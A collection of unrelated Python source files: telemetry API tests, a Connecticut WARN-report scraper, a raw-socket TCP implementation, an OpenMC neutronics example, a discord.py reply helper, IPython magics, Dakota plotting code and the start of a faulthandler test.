self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5)
self.api.assert_telemetry_sequence(search_seq)
time.sleep(1)
try:
self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
self.api.clear_histories()
self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.07)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
try:
self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=1)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
def test_assert_telemetry_count(self):
count_seq = self.get_counter_sequence(20)
sin_seq = self.get_oscillator_sequence(100)
pred = predicates.greater_than_or_equal_to(10)
search_pred = self.api.get_telemetry_pred("Counter", pred)
count_pred = predicates.within_range(10, 20)
self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
self.api.assert_telemetry_count(count_pred, search_pred, timeout=2)
self.api.assert_telemetry_count(count_pred, search_pred)
self.api.clear_histories()
t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01)
self.api.assert_telemetry_count(100, timeout=2)
t1.join()
t2.join()
try:
self.api.assert_telemetry_count(100)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
self.api.clear_histories()
self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05)
self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02)
try:
self.api.assert_telemetry_count(100, timeout=1)
raise self.AssertionFailure()
except AssertionError:
assert True, "api raised the correct error"
except self.AssertionFailure:
assert False, "api failed to raise an assertion error"
def test_translate_event_name(self):
assert self.api.translate_event_name("CommandReceived") == 1
assert self.api.translate_event_name("HistorySizeUpdate") == 2
assert self.api.translate_event_name("SeverityCOMMAND") == 3
assert self.api.translate_event_name("SeverityACTIVITY_LO") == 4
assert self.api.translate_event_name("SeverityACTIVITY_HI") == 5
assert self.api.translate_event_name("SeverityWARNING_LO") == 6
assert self.api.translate_event_name("SeverityWARNING_HI") == 7
assert self.api.translate_event_name("SeverityDIAGNOSTIC") == 8
assert self.api.translate_event_name("SeverityFATAL") == 9
for i in range(1, 10):
assert self.api.translate_event_name(i) == i
try:
self.api.translate_event_name("DOES_NOT_EXIST")
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
try:
self.api.translate_event_name(0)
assert False, "the api should have raised a KeyError"
except KeyError:
assert True, "the api raised the correct error"
def test_get_event_pred(self):
pred = predicates.event_predicate()
result = self.api.get_event_pred(pred)
assert pred == result, "should return when channel is already event_pred"
message = self.get_severity_event("FATAL")
pred = self.api.get_event_pred(
message.get_id(), message.get_args(), message.get_severity()
)
assert pred(message), "predicate should return true when fields are specified"
"""
def test_await_event(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_await_event_sequence(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_await_event_count(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event_sequence(self):
raise NotImplementedError("Test Case is not yet implemented")
def test_assert_event_count(self):
raise NotImplementedError("Test Case is not yet implemented")
"""
if __name__ == "__main__":
unittest.main()
|
import logging
from datetime import datetime
from pathlib import Path
from bs4 import BeautifulSoup
from .. import utils
from ..cache import Cache
__authors__ = [
"zstumgoren",
"Dilcia19",
"stucka",
]
__tags__ = ["html"]
__source__ = {
"name": "Connecticut Department of Labor",
"url": "https://www.ctdol.state.ct.us/progsupt/bussrvce/warnreports/warnreports.htm",
}
logger = logging.getLogger(__name__)
def scrape(
data_dir: Path = utils.WARN_DATA_DIR,
cache_dir: Path = utils.WARN_CACHE_DIR,
) -> Path:
"""
Scrape data from Connecticut.
Keyword arguments:
data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)
cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)
Returns: the Path where the file is written
"""
# Open the cache
cache = Cache(cache_dir)
# We start in 2015
current_year = datetime.now().year
# Get the full range of years
year_range = range(2015, current_year + 1)
output_rows = []
for year in year_range:
url = f"https://www.ctdol.state.ct.us/progsupt/bussrvce/warnreports/warn{year}.htm"
cache_key = f"ct/{year}.html"
if cache.exists(cache_key) and year < current_year:
html = cache.read(cache_key)
else:
r = utils.get_url(url)
html = r.text
cache.write(cache_key, html)
# Parse out the table
soup = BeautifulSoup(html, "html.parser")
if year == 2016:
table = soup.find_all("table", "style15")
else:
table = soup.find_all("table", "MsoNormalTable")
# Parse out the data
row_list = _scrape_table(table)
# Add data to the big list
output_rows.extend(row_list)
# Tack headers on the top
header_row = [
"warn_date",
"affected_company",
"layoff_location",
"number_workers",
"layoff_date",
"closing",
"closing_date",
"union",
"union_address",
]
row_list = [header_row] + output_rows
# Set the export path
data_path = data_dir / "ct.csv"
# Write out to csv
utils.write_rows_to_csv(data_path, row_list)
# Return the path
return data_path
def _scrape_table(table) -> list:
"""Scrape the provided table.
Returns: List of data rows.
"""
row_list = []
# loop over table to process each row, skipping the header
for table_row in table[0].find_all("tr")[1:]:
# Get all the cells
table_cells = table_row.find_all("td")
# if a row has more than 9 cells it is handled separately
# the 2016 table has some cells with nested tags
if len(table_cells) > 9:
output_row = _problem_cells(table_cells)
row_list.append(output_row)
continue
# if a row has less than 9 it is skipped because it is incomplete
elif len(table_cells) < 9:
continue
# for the rest, loop over cells for each row
output_row = []
for table_cell in table_cells:
cell = table_cell.text.strip()
cell = " ".join(cell.split())
output_row.append(cell)
# test to see if the row is blank
if not output_row:
continue
# Add row to the big list
row_list.append(output_row)
# Pass it back
logger.debug(f"{len(row_list)} rows parsed")
return row_list
def _problem_cells(table_cells):
"""Deal with problem rows in the 2016 table."""
output_row = []
for table_cell in table_cells:
current_cell = table_cell.text.strip()
current_cell = " ".join(current_cell.split())
if table_cells.index(table_cell) == 0:
output_row.append(current_cell)
else:
previous_index = table_cells.index(table_cell) - 1
previous_cell = table_cells[previous_index].text.strip()
previous_cell = " ".join(previous_cell.split())
if current_cell == previous_cell:
continue
else:
output_row.append(current_cell)
return output_row
if __name__ == "__main__":
scrape()
|
#! /usr/bin/python3
import random
import datetime
import time
import fcntl
from IP.IPSocket import *
from tcp.TCPPacket import *
import threading
class TCPSocket:
def __init__(self):
self.socket = None
self.connected = False
self.src = (get_ip(), random.randrange(0, 1 << 16))
self.destination = None
self.thread = None
self.seq = 0
self.received_packet = None
self.ssthresh = float("inf")
self.c_window = 1
self.adv_window = float('inf')
self.RTT = None
self.MSS = 536
self.next_packet = {
'ack_num': 1,
'seq': random.randrange(0, 1 << 32),
'ack': 0
}
self.used_seqs = set()
self.sending_packets = set()
self.send_queue = queue.Queue()
self.recv_queue = queue.Queue()
self.resend_queue = queue.PriorityQueue()
self.disorder_packets = queue.PriorityQueue()
def connect(self, destination):
""" Connect to server"""
if self.thread is not None and self.thread.is_alive():
# thread has been started
return
self.socket = IPSocket(get_ip())
self.socket.connect(destination)
self.destination = (socket.gethostbyname(destination[0]), destination[1])
# handshake
# starting seq number
self.seq = random.randint(0, 65535)
# Send the SYN packet
syn_packet = TCPPacket(self.src, self.destination, 0, self.seq)
syn_packet.syn = 1
syn_packet.checksum()
# Measure RTT
sent_time = datetime.datetime.now()
self.socket.send(syn_packet.build())
now = time.time()
packet = None
# keep trying to receive SYN_ACK packets.
while (time.time() - now) < 180 and packet is None:
packet = self.socket.recv()
if packet is not None:
packet = TCPPacket.unpack(packet, self.destination[0], self.src[0])
if packet.src == self.destination and packet.dest == self.src and packet.syn and packet.ack:
break
time.sleep(0.01)
else:
raise Exception("No response from server for 3 minutes")
# Calculate RTT
arrive_time = datetime.datetime.now()
self.RTT = (arrive_time - sent_time).total_seconds() * 1000
# Get Advertised Window
self.adv_window = packet.window
# Get MSS
for option in packet.options:
if option['kind'] == 2 and option['length'] == 4:
self.MSS = option['value']
break
# Get next seq
self.next_packet['next_seq'] = packet.seq + len(packet.data) + 1
self.seq = packet.ack_num
# Send the ACK packet
ack_packet = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'])
ack_packet.ack = 1
ack_packet.checksum()
self.socket.send(ack_packet.build())
# start the thread
self.connected = True
self.thread = threading.Thread(name="tcp-running", target=self.tcp_running_thread)
self.thread.setDaemon(True)
self.thread.start()
def tcp_running_thread(self):
"""
running TCP threads
"""
while True:
if self.connected:
self.send_packets()
packet = self.socket.recv()
while packet is not None:
self.convert_packet(packet)
packet = self.socket.recv()
if not self.connected:
self.close()
break
# check if timeout
if self.RTT is not None:
t_packets = []
now = datetime.datetime.now()
for packet in self.sending_packets:
if (now - packet[1]).total_seconds() * 1000 > 2 * self.RTT:
t_packets.append(packet)
# update window if timeout
if len(t_packets) > 0:
self.ssthresh = self.c_window / 2
self.c_window = 1
# resend the timeout packets
for packet in t_packets:
self.sending_packets.remove(packet)
self.resend_queue.put((packet[0].seq, packet[0]))
time.sleep(0.050)
def send_packets(self):
"""Send or resend packets to server"""
space = min(self.c_window, self.adv_window) / self.MSS - len(self.sending_packets)
# resend the timeout packets
while not self.resend_queue.empty():
if space > 0:
seq, packet = self.resend_queue.get()
if len(packet) <= self.MSS:
self.socket.send(packet.build())
self.sending_packets.add((packet, datetime.datetime.now(), True))
else:
break
# send new packets
while not self.send_queue.empty():
if space > 0:
if not self.connected:
return
else:
# Send a packet of data or ack another packet.
data = b''
while not self.send_queue.empty() and len(data) < self.MSS:
data += self.send_queue.get()
# Create packet
packet = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'], data)
packet.ack = 1
packet.checksum()
# Track sending packet.
self.sending_packets.add((packet, datetime.datetime.now(), False))
# Send packet
self.socket.send(packet.build())
else:
break
def convert_packet(self, packet):
"""Convert the packet"""
packet = TCPPacket.unpack(packet, self.destination[0], self.src[0])
packet.checksum()
# Check validity
if packet.check == 0 and packet.src == self.destination and packet.dest == self.src:
# Get MSS
for option in packet.options:
if option['kind'] == 2 and option['length'] == 4:
self.MSS = option['value']
break
if packet.fin or packet.rst:
self.connected = False
# Check if it contains data or syn
if (len(packet.data) > 0) or packet.syn:
self.next_packet['ack'] = 1
# Handle ACK
if packet.ack and packet.ack_num >= self.seq:
self.ack_process(packet)
# Get the next seq number
next_seq = packet.seq + len(packet.data)
if len(packet.data) > 0 and packet.seq == self.next_packet['next_seq']:
# This is the packet we need.
self.next_packet['next_seq'] = next_seq
self.recv_queue.put(packet.data)
while not self.disorder_packets.empty():
p = self.disorder_packets.get()
if p.seq == next_seq:
self.recv_queue.put(p.data)
next_seq = p.seq + len(p.data)
else:
self.disorder_packets.put(p)
break
elif len(packet.data) > 0 and packet.seq > self.next_packet['next_seq'] and packet.seq not in self.used_seqs:
# Packet is too early, store it.
self.disorder_packets.put(packet)
self.used_seqs.add(packet.seq)
# Ack the packet if it has data
if self.next_packet['ack']:
p = TCPPacket(self.src, self.destination, self.seq, self.next_packet['next_seq'])
p.ack = 1
p.checksum()
self.socket.send(p.build())
self.adv_window = packet.window
def ack_process(self, packet):
"""Deal the ACK packet"""
self.seq = packet.ack_num
# Find acked packets
acked_p = set()
packets_in_sending = self.sending_packets.copy()
for packet in packets_in_sending:
if packet[0].seq <= self.next_packet['seq']:
acked_p.add(packet)
self.sending_packets.remove(packet)
# Manage RTT.
now = datetime.datetime.now()
ALPHA = 0.875 # NEW_RTT = ALPHA * OLD_RTT + (1 - ALPHA) * PACKET_RTT
for packet in acked_p:
if not packet[2]:
# Packet didn't time out so it's valid for RTT calculation
packet_rtt = now - packet[1]
if self.RTT is not None:
self.RTT = ALPHA * self.RTT + (1 - ALPHA) * packet_rtt.total_seconds() * 1000
else:
self.RTT = packet_rtt.total_seconds() * 1000
# update the congestion window.
if self.ssthresh <= self.c_window:
self.c_window += (1 / self.c_window)
else:
self.c_window += 1
def sendall(self, data):
"""Send all the data"""
self.send_queue.put(data)
def recv(self, max=None):
"""Get data from the socket"""
packet = b''
if not self.connected:
raise Exception("Socket closed")
if self.received_packet is None:
while True:
if not self.recv_queue.empty():
packet += self.recv_queue.get(block=False)
else:
break
if max is not None and len(packet) > max:
self.received_packet = packet[max:]
packet = packet[:max]
else:
packet = self.received_packet
if max is None or len(packet) <= max:
self.received_packet = None
else:
self.received_packet = packet[max:]
packet = packet[:max]
return packet
def close(self):
"""Close the socket"""
self.next_packet['fin'] = 1
p = TCPPacket(self.src, self.destination, 0, self.seq)
p.fin = 1
p.checksum()
self.socket.send(p.build())
self.connected = False
def send(self, data):
"""Send some data over the network."""
self.send_queue.put(data)
def get_ip(interface='eth0'):
"""Get ip address of the source, only works for linux machine"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack('256s', interface[:15].encode())
ip = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, data)[20:24])
return ip |
<filename>examples/create_statepoint_file_with_meshes_openmc_dagmc.py<gh_stars>0
# This minimal example makes a 3D volume and exports the shape to a stp file
# A surrounding volume called a graveyard is needed for neutronics simulations
import openmc
import openmc_dagmc_wrapper as odw
import openmc_plasma_source as ops
from stl_to_h5m import stl_to_h5m
from dagmc_bounding_box import DagmcBoundingBox
# code used to create example.stl
# import paramak
# my_shape = paramak.ExtrudeStraightShape(
# points=[(1, 1), (1, 200), (600, 200), (600, 1)],
# distance=180,
# )
# my_shape.export_stl("example.stl")
# This script converts the CAD stl files generated into h5m files that can be
# used in DAGMC enabled codes. h5m files created in this way are imprinted,
# merged, faceted and ready for use in OpenMC. One of the key aspects of this
# is the assignment of materials to the volumes present in the CAD files.
stl_to_h5m(
files_with_tags=[("example.stl", "mat1")],
h5m_filename="dagmc.h5m",
)
my_corners = DagmcBoundingBox("dagmc.h5m").corners()
# makes use of the previously created neutronics geometry (h5m file) and assigns
# actual materials to the material tags. Sets simulation intensity and specifies
# the neutronics results to record (know as tallies).
geometry = odw.Geometry(
h5m_filename="dagmc.h5m",
)
materials = odw.Materials(
h5m_filename="dagmc.h5m", correspondence_dict={"mat1": "FLiNaK"}
)
tally1 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xy",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally2 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="yz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally3 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally4 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xy",
mesh_resolution=(10, 10),
bounding_box=my_corners,
)
tally5 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="yz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
tally6 = odw.MeshTally2D(
tally_type="neutron_effective_dose",
plane="xz",
mesh_resolution=(10, 5),
bounding_box=my_corners,
)
# tally2 = odw.MeshTally3D(
# mesh_resolution=(100, 100, 100),
# bounding_box=my_corners,
# tally_type="neutron_effective_dose",
# )
tallies = openmc.Tallies(
[
tally1,
tally2,
tally3,
tally4,
tally5,
tally6,
]
)
settings = odw.FusionSettings()
settings.batches = 2
settings.particles = 1000
# assigns a ring source of DT energy neutrons to the source using the
# openmc_plasma_source package
settings.source = ops.FusionPointSource()
my_model = openmc.Model(
materials=materials, geometry=geometry, settings=settings, tallies=tallies
)
statepoint_file = my_model.run()
|
from __future__ import annotations
import re
import inspect
import typing as t
from abc import ABC
import discord
from discord.ext import commands
import asyncio
import blurple.ui as ui
class Reply(ABC):
""" An abstract class for getting replies, to be extended.
If you are trying to get a reply from the user directly, you may be looking for :class:`MessageReply` or :class:`ReactionAddReply`.
:Extending this class::
In order to extend this class, there are 5 methods you can specialize.
- :func:`on_reply_init` Use this method to initialize variables at the start.
- :func:`on_pre_reply` Use this method to prepare anything before reply attempts.
- :func:`reply_check` This is required. Evaluate whether an event call is considered a user reply attempt.
- :func:`on_reply_attempt` Use this method to handle resetting the state after a reply attempt.
- :func:`on_reply_complete` Use this method to handle final cleanup.
:param ctx: The :class:`~commands.Context` variable
:param validate: An optional parameter to validate the reply.
- If left blank, no validation will be performed.
- If you pass a :class:`list` / :class:`set`, validation will succeed when the reply content is found inside the list/set.
- If you pass a :class:`str`, validation will succeed when the reply content matches the string as a regex.
- If you pass a :class:`function` or :class:`coroutine`, the function will be called, and the coroutine awaited, validation will succeed when the function returns a Truthy value. The reply object will be passed as a parameter.
:param error: An optional parameter specifying the message to send when the user fails validation, defaults to a simple "Invalid Reply" :class:`~Alert`.
"""
def __init__(self,
ctx: commands.Context,
*,
validate: t.Optional[t.Union[str, t.Callable, t.List]] = None,
on_error: t.Union[str, discord.Embed] = ui.Alert(ui.Style.DANGER, title="Invalid Reply"),
timeout = 180,
**kwargs) -> None:
self.ctx = ctx
self.validate = validate
self.on_error = on_error
self.error = None
self.timeout = timeout
self.kwargs = kwargs
def __str__(self):
return self.__class__.__name__
def __repr__(self):
return f"<{self.__class__.__name__} for '{self.event}'>"
async def result(self):
"""Await the result of the reply."""
await self.on_reply_init(**self.kwargs) # Event method
reply = await self._get_valid_reply()
await self._cleanup() # Event method
return reply
async def _cleanup(self):
"""Clean up reply after result."""
await self.on_reply_complete()
await self._delete_error()
async def _get_valid_reply(self):
"""Wrap get_reply with validation, error handling, and recursive calls."""
reply = await self._get_reply()
if reply is not None: # Reply hasn't timed out
# Validate reply
is_valid = await self._validate_reply(reply, self.validate)
# If reply isn't valid, recursively call function
if not is_valid:
await self._send_error()
return await self._get_valid_reply()
return reply
async def _get_reply(self):
"""Get a reply from the user, no validation."""
await self.on_pre_reply() # Event method
# Wait for reply
try:
raw_reply = await self.ctx.bot.wait_for(
self.event,
check=self.reply_check,
timeout=self.timeout
)
except asyncio.TimeoutError:
reply = None
else:
r = await self.on_reply_attempt(raw_reply) # Event method
reply = r if r else raw_reply
return reply
async def _send_error(self) -> discord.Message:
""" Send an error message to the user.
Will replace the current error message.
:param error: An embed or a string representing the error message.
"""
await self._delete_error()
if isinstance(self.on_error, discord.Embed):
self.error = await self.ctx.send(embed=self.on_error)
elif isinstance(self.on_error, str):
self.error = await self.ctx.send(self.on_error)
return self.error
async def _delete_error(self) -> None:
"""Delete the current error message, if it exists."""
if self.error is None:
return
await self.error.delete()
self.error = None
@classmethod
async def _validate_reply(cls, reply, valid: t.Union[str, t.Container, t.Callable]) -> bool:
"""Detect validation type and check it against the reply."""
if valid is None:
return True
content = cls._get_reply_content(reply)
if isinstance(valid, str):
return bool(re.search(valid, content))
if cls._iscontainer(valid):
return content in valid
if callable(valid):
if inspect.iscoroutinefunction(object):
return await valid(reply)
return valid(reply)
@staticmethod
def _get_reply_content(reply):
""" Retrieve the content of the reply."""
if isinstance(reply, discord.Message):
return reply.content
if isinstance(reply, (discord.Reaction, discord.RawReactionActionEvent)):
return str(reply.emoji)
@staticmethod
def _iscontainer(obj: t.Union[t.Container, t.Any]):
return getattr(obj, "__contains__", False)
@classmethod
async def result_between(cls, replies: t.Container[Reply]) -> t.Tuple[Reply, t.Any]:
""" Return the first completed result between multiple reply objects.
:param replies: A collection of Reply objects.
:returns: A tuple containing the Reply object and the result it returned.
:How to use this:
This can be an especially powerful function if used correctly.
Here's an example of an rsvp list interaction with reactions using this function.
This is completely contrived for example and not a practical use.
.. code-block:: python
rsvp_react = "..." # Replace this with whatever you want
rsvp_list = []
# Start the reply wait
message = await ctx.send("React to RSVP!")
await message.add_reaction(rsvp_react)
add = io.ReactionAddBasic(message, validate=[rsvp_react])
remove = io.ReactionRemoveBasic(message, validate=[rsvp_react])
while True:
obj, result = io.Reply.result_between({add, remove})
if obj is add:
rsvp_list.append(result.user_id)
elif obj is remove:
rsvp_list.remove(result.user_id)
else: # obj is None (The reply timed out)
break
# Reply wait complete
await message.clear_reactions()
await message.edit(f"Here's the list of RSVPrs:\\n{'\\n'.join([f'> <@{user_id}>' for user_id in rsvp_list])}")
"""
# Prepare tasks
timeouts = []
def parse_task(reply: Reply):
# Handle timeout
timeouts.append(reply.timeout)
reply.timeout = None
# Return task
return asyncio.create_task(reply.result(), name=reply)
# Wait tasks
tasks = [parse_task(task) for task in replies]
task, result = await cls._wait_tasks(tasks, timeout=min(timeouts))
# Get original reply object
for obj in replies:
if task is None:
obj = None
break
if str(obj) == task.get_name():
break
# Run cleanup on cancelled replies
replies.remove(obj)
for cancelled in replies:
await cancelled._cleanup()
# Return original reply object and the result
return obj, result
@staticmethod
async def _wait_tasks(tasks: t.Container[asyncio.Task], timeout: int) -> t.Tuple[t.Optional[asyncio.Future], t.Optional[t.Any]]:
""" Try block to asyncio.wait a set of tasks with timeout handling.
:param tasks: A collection of task objects
:param timeout: How long in seconds to wait until a timeout occurs.
:return: A tuple containing the task and the result. Both will be None if a timeout occurs.
"""
done, pending = await asyncio.wait(tasks, timeout=timeout, return_when=asyncio.FIRST_COMPLETED)
for rest in pending:
rest.cancel()
if done:
task: asyncio.Future = done.pop()
return task, task.result()
return None, None
async def on_reply_init(self):
""" An abstract method, to be extended in custom Reply listeners.
This method runs when the Reply class is created.
"""
async def on_pre_reply(self):
""" An abstract method, to be extended in custom Reply listeners.
This method runs before each reply attempt, can run multiple times with validation.
"""
def reply_check(self, reply):
""" An abstract method, to be extended in custom Reply listeners.
This method runs as a check to determine whether to recognize the reply event, can run multiple times with validation.
"""
async def on_reply_attempt(self, reply):
""" An abstract method, to be extended in custom Reply listeners.
This method runs after each reply attempt, can run multiple times with validation.
:return: You can optionally return a parsed version of the reply to be used instead of the raw reply object.
"""
async def on_reply_complete(self):
""" An abstract method, to be extended in custom Reply listeners.
This method runs after a valid reply is returned.
"""
|
"""
Magic commands.
"""
from __future__ import print_function
from IPython.core.magic import Magics, magics_class, line_magic
@magics_class
class MyMagics(Magics):
@line_magic
def loadnpz(self, params=''):
"""Load a npz file into user namespace.
%loadnpz <filename.npz>
"""
import numpy as np
ip = get_ipython()
args = params.split()
if len(args) == 0:
return
filename, = args
ip.push(dict(np.load(filename)), interactive=True)
@line_magic
def loadmat(self, params=''):
"""Load a MATLAB file into user namespace.
%loadmat [-s] <filename.mat>
The -s option squeezes unit matrix dimensions.
"""
from scipy.io import loadmat
ip = get_ipython()
args = params.split()
squeeze_me = False
if len(args) > 0 and args[0] == '-s':
squeeze_me = True
args = args[1:]
if len(args) == 0:
print("no filename specified")
return
ip.push(loadmat(args[0], squeeze_me=squeeze_me), interactive=True)
@line_magic
def savemat(self, params=''):
"""Save interactive variables to a MATLAB file.
%savemat [-c] <filename.mat>
- Saves all interactive variables.
%savemat [-c] <filename.mat> <var1 var2 ...>
- Saves selected variables var1, var2, etc. only.
The -c option turns on compression of the resulting MATLAB file.
"""
import scipy.io as sio
ip = get_ipython()
args = params.split()
do_compression = False
if len(args) > 0 and args[0] == '-c':
do_compression = True
args = args[1:]
if len(args) == 0:
print("no filename specified")
return
filename, vars = args[0], args[1:]
if len(vars) == 0:
sel = dict((k, ip.user_ns[k]) for k in ip.magic('%who_ls'))
print("Saving variables:", list(sel.keys()))
sio.savemat(filename, sel, do_compression=do_compression)
else:
sel = dict((k, ip.user_ns[k]) for k in vars)
print("Saving variables:", list(sel.keys()))
sio.savemat(filename, sel, do_compression=do_compression)
@line_magic
def imshow(self, params=''):
"""Shows given image in matplotlib.
%imshow [options] name ...
-t <title> Set title of all figures. The default title
is the name of the image.
-c <cmap> Set colormap of all figures (e.g. gray).
"""
import matplotlib.pyplot as plt
from matplotlib import cm
opts, args = self.parse_options(params, 'c:t:')
names = args.split()
cmap = cm.get_cmap()
if 'c' in opts:
cmap = cm.get_cmap(name=opts.c)
if cmap is None:
print("invalid colormap:", opts.c)
return
titles = names
if 't' in opts:
titles = len(names)*[opts.t]
ip = get_ipython()
for name, tl in zip(names, titles):
img = np.squeeze(ip.user_ns[name])
if img.ndim != 2:
print("%s is not 2-D; skipping" % (name,))
continue
plt.figure()
plt.imshow(img, cmap=cmap)
plt.colorbar()
plt.title(tl)
if __name__ == '__main__':
ip = get_ipython()
ip.register_magics(MyMagics)
# clean up ipython's namespace
del ip, MyMagics
|
<gh_stars>1-10
"""Make plots of the results of Dakotathon experiments."""
import os
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
TRANGE = [10., 20.]
PRANGE = [ 1., 2.]
CSRANGE = [10., 45.0]
plt.rcParams['mathtext.default'] = 'regular'
cmap = plt.cm.PuOr_r
def read_dat_header(dat_file):
try:
with open(dat_file, 'r') as fp:
names = fp.readline().split()
except IOError:
pass
else:
return names
def read_dat_file(dat_file):
names = read_dat_header(dat_file)
rnames = range(len(names))
rnames.pop(names.index('interface'))
return np.loadtxt(dat_file, skiprows=1, unpack=True, usecols=rnames)
def grid_samples(x, y, z):
xy = np.array([x, y])
xy_t = np.transpose(xy)
grid_x, grid_y = np.mgrid[TRANGE[0] : TRANGE[1] : complex(20),
PRANGE[0] : PRANGE[1] : complex(20)]
grid_z = griddata(xy_t, z, (grid_x, grid_y), method='linear')
return (grid_x, grid_y, grid_z)
def make_stacked_surface_plot(x, y, z, outfile='surface.png'):
X, Y, Z = grid_samples(x, y, z)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(x, y, zs=CSRANGE[0], s=10, zdir='z', c='r')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0.5, color=cmap(0.2))
plt.title('Hydrotrend: T-P samples and max($C_s}$) response')
ax.set_xlim(TRANGE)
ax.set_ylim(PRANGE)
ax.set_zlim(CSRANGE)
plt.locator_params(axis='x', nbins=5)
plt.locator_params(axis='y', nbins=5)
ax.set_autoscale_on(False)
ax.set_xlabel(r'$T\ [^{o}C]$')
ax.set_ylabel('$P\ [m\ yr^{-1}]$')
ax.set_zlabel('$C_s\ [kg\ m^{-3}]$')
ax.tick_params(axis='both', labelsize=10)
plt.savefig(outfile, dpi=150)
plt.close()
def make_contour_plot(x, y, z, outfile='contour.png'):
X, Y, Z = grid_samples(x, y, z)
fig = plt.figure()
ax = fig.add_subplot(111)
nlevels = 8
clevels = np.linspace(CSRANGE[0], CSRANGE[1], nlevels)
c = ax.contourf(X, Y, Z, 10, cmap=cmap, vmin=0.1, antialiased=True, levels=clevels)
ax.scatter(x, y, s=10, c=cmap(0.9))
plt.title('Hydrotrend: T-P samples and max($C_s}$) response')
ax.set_xlim(TRANGE)
ax.set_ylim(PRANGE)
plt.locator_params(axis='x', nbins=5)
plt.locator_params(axis='y', nbins=5)
ax.set_xlabel(r'$T\ [^{o}C]$')
ax.set_ylabel('$P\ [m\ yr^{-1}]$')
cbar = plt.colorbar(c, shrink=0.75, aspect=25, extend='both')
cbar.ax.set_ylabel('$max(C_s)\ [kg\ m^{-3}]$')
plt.savefig(outfile, dpi=150)
plt.close()
def make_pdf_and_cdf_plot(z, outfile='histogram.png'):
fig, ax1 = plt.subplots()
nbins = 21
bins = np.linspace(0, 50, nbins)
pdf, _, _ = ax1.hist(z, bins=bins, normed=True, color=cmap(0.4))
plt.title('Hydrotrend: max($C_s}$) response distribution')
ax1.set_ylim(0.0, 0.1)
ax1.set_xlabel('$max(C_s)\ [kg\ m^{-1}]$')
ax1.set_ylabel('pdf')
cdf = np.cumsum(pdf)
cdf /= cdf.max()
ax2 = ax1.twinx()
ax2.plot(bins[:-1], cdf, color='b')
ax2.set_ylabel('cdf')
cs_mean = 20.31
cs_stdv = 6.74
cs_ci_lower = 18.97
cs_ci_upper = 21.65
top = ax2.get_ylim()[-1]
ymrk = 0.95*top
ax2.plot(cs_mean-cs_stdv, ymrk, '|', color=cmap(0.3), ms=15, mew=1)
ax2.plot(cs_mean+cs_stdv, ymrk, '|', color=cmap(0.3), ms=15, mew=1)
ax2.plot([cs_mean-cs_stdv, cs_mean+cs_stdv], [ymrk, ymrk], color=cmap(0.3), lw=0.75)
ax2.plot(cs_mean, ymrk, 's', color=cmap(0.3))
ax2.plot(cs_ci_lower, ymrk, '|', color=cmap(0.3), ms=10, mew=1)
ax2.plot(cs_ci_upper, ymrk, '|', color=cmap(0.3), ms=10, mew=1)
cs_thresh = 40.0
cs_thresh_value = 0.98
right = ax2.get_xlim()[-1]
ax2.plot([cs_thresh, cs_thresh], [0, cs_thresh_value], color=cmap(0.9), lw=0.5)
ax2.plot([cs_thresh, right], [cs_thresh_value, cs_thresh_value], color=cmap(0.9), lw=0.5)
ax2.text(0.95*right, 0.925*top, '0.98', ha='center', size=15)
plt.savefig(outfile, dpi=150)
plt.close()
if __name__ == '__main__':
experiment_dir = os.getcwd()
dat_file = os.path.join(experiment_dir, 'dakota.dat')
dat = read_dat_file(dat_file)
T = dat[1,]
P = dat[2,]
C_s = dat[3,]
make_stacked_surface_plot(T, P, C_s)
make_contour_plot(T, P, C_s)
make_pdf_and_cdf_plot(C_s)
|
from __future__ import with_statement
from contextlib import contextmanager
import datetime
import faulthandler
import os
import re
import signal
import subprocess
import sys
import tempfile
import unittest
from textwrap import dedent
try:
import threading
HAVE_THREADS = True
except ImportError:
HAVE_THREADS = False
TIMEOUT = 1
MS_WINDOWS = (os.name == 'nt')
Py_REF_DEBUG = hasattr(sys, 'gettotalrefcount')
try:
from test.support import SuppressCrashReport
except ImportError:
try:
import resource
except ImportError:
resource = None
class SuppressCrashReport:
